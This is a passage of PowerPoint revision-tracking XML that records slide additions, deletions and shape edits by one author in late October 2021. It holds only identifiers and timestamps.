        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T15:21:19.852" v="1815" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3685238653" sldId="263"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T15:21:08.506" v="1813"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="104950868" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T13:44:06.165" v="1055" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="104950868" sldId="264"/>
            <ac:spMk id="2" creationId="{45134E06-8573-48FF-ABB7-7864149192DB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T13:44:06.165" v="1055" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="104950868" sldId="264"/>
            <ac:spMk id="3" creationId="{8389D5F8-6538-4779-934C-A280732A3BD5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T13:44:17.671" v="1059" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="104950868" sldId="264"/>
            <ac:spMk id="4" creationId="{6510532A-33FC-400C-9B97-B9380AF88CFD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T13:46:52.642" v="1064"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="104950868" sldId="264"/>
            <ac:spMk id="7" creationId="{7009BBB3-2F76-4135-87E7-5500F7678BD6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T13:45:46.198" v="1061" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="104950868" sldId="264"/>
            <ac:picMk id="6" creationId="{135C55DD-1FCD-4143-B334-7421462C26DB}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T15:09:31.596" v="5" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3224546949" sldId="265"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:48:29.599" v="1656" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3468833480" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:02:09.831" v="1525" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3468833480" sldId="265"/>
            <ac:spMk id="2" creationId="{32B1D6D7-0D2E-4882-B59F-DAE23D77783C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:48:29.599" v="1656" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3468833480" sldId="265"/>
            <ac:spMk id="3" creationId="{1D53A39F-EB1F-4BB9-BBC4-DEAF6708D69E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:30:42.970" v="1556" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3468833480" sldId="265"/>
            <ac:picMk id="4" creationId="{A6ED76FC-D3E6-420D-8C37-3D79D80D01CA}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="new del ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T15:21:19.210" v="1814" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1783018490" sldId="266"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T15:09:31.723" v="6" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2827003046" sldId="266"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:31:14.304" v="1572" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="824954207" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:31:14.304" v="1572" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="824954207" sldId="267"/>
            <ac:spMk id="2" creationId="{B55FD7E4-8B64-4C1B-B295-CA3D5EB0B958}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T15:09:32.644" v="9" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3484017992" sldId="267"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T15:09:33.125" v="10" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="460068569" sldId="268"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T15:09:31.901" v="7" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1072172507" sldId="269"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-29T15:09:32.124" v="8" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2637752598" sldId="270"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T15:07:03.794" v="1721" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="493733997" sldId="302"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T15:07:03.794" v="1721" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="493733997" sldId="302"/>
            <ac:spMk id="2" creationId="{A1B69D61-741B-4A5C-945F-DF6F260DF44D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T15:06:23.076" v="1707" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="493733997" sldId="302"/>
            <ac:spMk id="3" creationId="{F3B014D9-EAD7-4A5F-A4DC-921919091233}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T15:06:31.282" v="1708" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="493733997" sldId="302"/>
            <ac:picMk id="6" creationId="{29E43A20-18A6-4DFA-B6FB-33CFFACE2F13}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod setBg modClrScheme delDesignElem chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:57:10.929" v="1663" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="180323046" sldId="306"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:39:42.642" v="1579" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180323046" sldId="306"/>
            <ac:spMk id="2" creationId="{6A88AA47-8579-4C13-B43C-A6E44B8B427F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:53:38.019" v="1662" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180323046" sldId="306"/>
            <ac:spMk id="5" creationId="{BB443895-66E0-482A-B241-956703F1CC55}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:39:42.642" v="1579" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180323046" sldId="306"/>
            <ac:spMk id="10" creationId="{15205974-E83A-4363-B2C2-C363E82A3F80}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:38:55.316" v="1574"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180323046" sldId="306"/>
            <ac:spMk id="11" creationId="{D4771268-CB57-404A-9271-370EB28F6090}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:39:42.642" v="1579" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180323046" sldId="306"/>
            <ac:spMk id="12" creationId="{976719DA-9BFD-4992-98E3-27BE4EE68198}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:40:07.247" v="1585" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180323046" sldId="306"/>
            <ac:spMk id="13" creationId="{DC5D7D93-3233-449F-81F3-D5A52D384402}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:39:42.642" v="1579" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180323046" sldId="306"/>
            <ac:spMk id="14" creationId="{3C1361A8-5D52-4996-B20F-4D6DEAD2561B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:39:57.207" v="1583"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180323046" sldId="306"/>
            <ac:spMk id="18" creationId="{DD4098BE-52B4-486D-BFF9-67C1A61B87F7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:39:57.207" v="1583"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180323046" sldId="306"/>
            <ac:spMk id="19" creationId="{660ED54B-5194-4821-B782-888FCFABFDB4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:39:57.207" v="1583"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180323046" sldId="306"/>
            <ac:spMk id="20" creationId="{48BC3EC2-867A-4A0F-AE6B-4019366773E3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:39:42.642" v="1579" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180323046" sldId="306"/>
            <ac:picMk id="4" creationId="{FDEB9B75-4F1C-45B6-BDAA-B8C7879BB451}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:39:42.642" v="1579" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180323046" sldId="306"/>
            <ac:picMk id="6" creationId="{E331EAB9-54EA-479B-A015-8FB1BD109A76}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:39:57.207" v="1583"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180323046" sldId="306"/>
            <ac:picMk id="15" creationId="{368A1A2D-A12E-47E5-AEB6-5CAF311C1E26}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:39:57.207" v="1583"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180323046" sldId="306"/>
            <ac:picMk id="17" creationId="{92CF3BBD-8B33-4B6A-A37C-EF87D38551F3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:39:42.642" v="1579" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180323046" sldId="306"/>
            <ac:cxnSpMk id="16" creationId="{8B0B566C-98D5-4B44-B3BD-56D3D68CDC36}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:39:57.207" v="1583"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180323046" sldId="306"/>
            <ac:cxnSpMk id="21" creationId="{1B9C2624-0CD5-44B9-8B46-DCD5A1175ED4}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:43:31.849" v="1602"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3237227748" sldId="307"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add setBg">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:49:54.790" v="1657"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1577270902" sldId="308"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T15:17:31.199" v="1807" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1809058598" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T15:16:30.324" v="1789" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1809058598" sldId="310"/>
            <ac:spMk id="2" creationId="{95718181-9D12-45DE-A49C-CD838642EB64}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T15:08:18.672" v="1722" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1809058598" sldId="310"/>
            <ac:spMk id="4" creationId="{75B4B96E-BCFA-40B2-8153-EC11676FFBB4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T15:17:31.199" v="1807" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1809058598" sldId="310"/>
            <ac:spMk id="5" creationId="{5A6DBFC8-C76A-4535-991B-C982FBC9BA91}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T15:16:24.969" v="1788" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1809058598" sldId="310"/>
            <ac:picMk id="3" creationId="{0EF6CAFC-0C64-46F3-AA81-38702452BE5C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T15:16:24.969" v="1788" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1809058598" sldId="310"/>
            <ac:cxnSpMk id="7" creationId="{1F4069AB-58E9-4D3B-9FE0-D4CD7720AA80}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T15:16:24.969" v="1788" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1809058598" sldId="310"/>
            <ac:cxnSpMk id="9" creationId="{130534AD-4600-4BEA-A636-168790CF73A9}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="add del setBg">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T15:10:51.623" v="1787" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4192303" sldId="311"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:59:54.136" v="1669" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="591621681" sldId="312"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del setBg">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:59:32.543" v="1667" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="214490323" sldId="313"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="delSp add del setBg delDesignElem">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:59:39.281" v="1668" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3337387503" sldId="318"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:51:43.158" v="1661"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3337387503" sldId="318"/>
            <ac:spMk id="21" creationId="{46F7435D-E3DB-47B1-BA61-B00ACC83A9DE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{835C2824-055A-4356-B4DE-4378ABF214B6}" dt="2021-10-30T14:51:43.158" v="1661"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3337387503" sldId="318"/>
            <ac:spMk id="22" creationId="{F263A0B5-F8C4-4116-809F-78A768EA79A6}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{F3F766CC-C2FD-4671-85C9-A3B323AD84DA}"/>
    <pc:docChg chg="delSld">
      <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{F3F766CC-C2FD-4671-85C9-A3B323AD84DA}" dt="2021-10-29T15:08:36.838" v="5" actId="47"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{F3F766CC-C2FD-4671-85C9-A3B323AD84DA}" dt="2021-10-29T15:08:35.912" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1738688579" sldId="272"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{F3F766CC-C2FD-4671-85C9-A3B323AD84DA}" dt="2021-10-29T15:08:36.431" v="3" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1786688070" sldId="273"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{F3F766CC-C2FD-4671-85C9-A3B323AD84DA}" dt="2021-10-29T15:08:36.623" v="4" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2641507804" sldId="274"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{F3F766CC-C2FD-4671-85C9-A3B323AD84DA}" dt="2021-10-29T15:08:36.838" v="5" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3229862276" sldId="275"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{F3F766CC-C2FD-4671-85C9-A3B323AD84DA}" dt="2021-10-29T15:08:36.119" v="1" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1874066169" sldId="276"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{F3F766CC-C2FD-4671-85C9-A3B323AD84DA}" dt="2021-10-29T15:08:36.251" v="2" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4086215798" sldId="277"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
